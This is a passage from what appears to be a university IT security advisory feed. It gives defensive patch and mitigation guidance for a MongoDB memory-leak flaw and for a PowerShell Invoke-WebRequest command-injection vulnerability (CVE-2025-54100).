  • All 4.2.x, 4.0.x, and 3.6.x versions.

Impact:- MongoDB can handle sensitive information such as PII, authentication credentials, tokens, keys, and operational metadata. Memory leaks may expose authentication tokens and secrets, database session data, and PII. Even a read-only leak can enable credential compromise, leading to data theft or full system takeover.

Resolution:-

  • Patch immediately to: 8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32, 4.4.30, or newer.
  • If patching is delayed: disable zlib compression by setting networkMessageCompressors to a value that excludes zlib, and restrict network access to trusted IPs only.
  • Enable verbose JSON logging to track connection metadata and parsing errors.
  • Scan logs for bursty connections with missing metadata from suspicious IPs.
  • If exploitation is suspected, contact infosec@yorku.ca, rotate secrets such as tokens, keys, and credentials that may have been leaked.

Reference:

UIT - Information Security

PowerShell Remote Code Execution (CVE-2025-54100)
Published: Fri, 06 Feb 2026 16:37:01 +0000
/uit/infosec/2026/02/06/powershell-remote-code-execution-cve-2025-54100/

Microsoft has released security updates to address a vulnerability in Windows PowerShell (CVE-2025-54100) that could allow local users to execute arbitrary code when using the Invoke-WebRequest cmdlet.

Severity level:-

CVSS Score: 7.8/High

Description:- CVE-2025-54100 is a command injection vulnerability in Windows PowerShell, specifically affecting the Invoke-WebRequest cmdlet. The flaw occurs because PowerShell automatically parses HTML content using the MSHTML engine, which can inadvertently execute embedded scripts during parsing. This behavior allows attackers to craft malicious web content that, when processed by Invoke-WebRequest, could lead to unintended script execution. Exploitation requires local access and user interaction, such as running a script that invokes Invoke-WebRequest on a malicious URL.

Affected Versions:-

All systems using Windows PowerShell 5.1 on vulnerable Windows versions:

  • Windows 10.
  • Windows 11.
  • Windows Server (2008 through 2025 editions).

Impact:-

Successful exploitation of this vulnerability may allow attackers to execute arbitrary code on the affected system.

After applying the patch, users will receive a security warning prompt before parsing any web content that could execute scripts.

Resolution:-

Apply the latest security updates released by Microsoft.

Reference:-

UIT Information Security
